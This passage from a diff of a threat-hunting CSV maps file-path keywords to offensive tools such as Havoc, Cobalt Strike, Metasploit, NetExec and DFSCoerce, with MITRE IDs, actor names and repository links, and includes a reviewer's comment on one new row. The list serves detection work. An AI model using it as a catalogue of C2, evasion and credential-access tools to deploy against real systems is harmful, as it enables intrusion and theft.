T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/Dendrobate.git*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.bin*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.csproj*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" 
@@ -3305,28 +3313,29 @@ "*/Dent/Loader*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/DesertFox/archive/*.zip*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*/detail/kali-linux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/detect_antivirus/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/detect_antivirus/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/detect_antivirus/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/detect_antivirus/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*/detect-hooks.c*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/detect-hooks.cna*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File 
(BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/detect-hooks.h*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/Detect-Hooks/*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/DFSCoerce.git*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" +"*/dfscoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Dialogs/Payload.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/Dialogs/Payload.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/dicom-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dicom-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dict-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/dicts/ftp_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/dicts/ftp_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - 
TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" "*/DInjector.git*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" "*/DInvoke/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*/DInvokeResolver/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*/dir_brute.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/dirbuster*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/dirbuster*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/dirbuster/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DirCreate2System.git*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*/direct_syscall_amd64.s*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" -"*/dirsearch.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*/dirsearch.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*/Dirty-Pipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","257","74","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z" "*/Dirty-Pipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*/Dirty-Pipe/main/exploit-static*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" 
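Review bot: The added `*/dfscoerce.py*` row labels every hit as NetExec, but the same file name plausibly also belongs to the standalone DFSCoerce PoC that the row directly above (`*/DFSCoerce.git*`, Wh04m1001/DFSCoerce) already tracks, so an alert on this keyword cannot say which tool was seen. I would either narrow the keyword to the directory NetExec ships the module under (placeholder, to be confirmed against the repository: `*/<netexec-modules-dir>/dfscoerce.py*`) or record the overlap in `metadata_comment` in place of `"N/A"`. The technique column also reuses the generic NetExec mapping `T1069 - T1021 - T1136 - T1018`; for a coercion module, forced authentication (T1187) looks like the closer fit and would help analysts triage the hit, though that is inferred from the module name only. The remaining changes in this hunk are star/fork/timestamp refreshes and need no review.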
@@ -3340,26 +3349,26 @@ "*/dist/fw_walk.*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*/distcc-cve2004-2687.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/distopia-test*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" -"*/dll/inject/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/dll/inject/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/dllexploit.cpp*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/dllexploit.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" -"*/DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 